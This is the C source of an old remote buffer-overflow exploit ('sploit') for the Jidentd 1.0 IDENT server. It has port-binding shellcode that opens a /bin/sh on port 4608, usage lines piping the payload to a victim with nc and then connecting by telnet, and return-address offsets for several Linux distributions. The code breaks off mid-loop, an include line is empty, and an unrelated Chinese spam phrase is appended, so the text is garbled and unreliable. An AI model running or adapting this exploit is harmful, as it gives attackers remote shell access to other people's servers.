/* * Jidentd 1.0 IDENT server remote sploit * funkySh 03/08/99(v.2) / port-bind shellcode by tekneeq * run: jidex [offset] | nc victim 113 * telnet victim 4608 * * tested under: * Slackware 3.6, 4.0 offset = 0 * Debian 2.1 offset = * Redhat 5.1, 5.2 offset = 700 * 5.0 offset = 800 * 4.1 offset = * * also try to modify ALIGN if not work. */ #include char code[] = "\x31\xdb\xb0\x1b\xcd\x80\xeb\x40\x5e\x31\xc0\x40\x89\x46\x04" "\x89\xc3\x40\x89\x06\xb0\x06\x89\x46\x08\xb0\x66\x8d\x0e\xcd" "\x80\x89\x06\x8d\x4e\x0c\x89\x4e\x04\x31\xc0\x89\x46\x10\x89" "\x46\x14\xb0\x02\x89\xc3\x89\x46\x0c\xb0\x12\x89\x46\x0e\xb0" "\x10\x89\x46\x08\xb0\x66\x8d\x0e\xcd\x80\xeb\x02\xeb\x62\x31" "\xdb\x89\xd8\xb3\x01\x89\x5e\x04\xb3\x04\x8d\x0e\xb0\x66\xcd" "\x80\x31\xc0\x8d\x4e\x0c\x89\x4e\x04\x8d\x4e\x1c\x89\x4e\x08" "\x8d\x0e\xb3\x05\xb0\x66\xcd\x80\x89\xc3\x31\xc0\x89\xc1\xb0" "\x3f\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80" "\x89\xf2\x83\xc2\x20\x89\xd6\x89\x76\x08\x31\xc0\x88\x46\x07" "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\x31\xdb\x89\xd8\x40\xcd\x80\xe8\x57\xff\xff\xff\x6a\x75\x6e" "\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75" "\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b\x6a\x75\x6e\x6b/bin/sh"; #define BUFFER 1100 #define NOP 0x90 #define RET_ADDR 0xbffff704 #define ALIGN 0 char buf[BUFFER]; void main(int argc, char * argv[]) { int i, offset = 0; long address; if(argc > 1) offset = atoi(argv[1]); address = RET_ADDR + offset; memset(buf,NOP,BUFFER); memcpy(buf+700,code,strlen(code)); for(i=923+ALIGN;i

亚洲欧美在线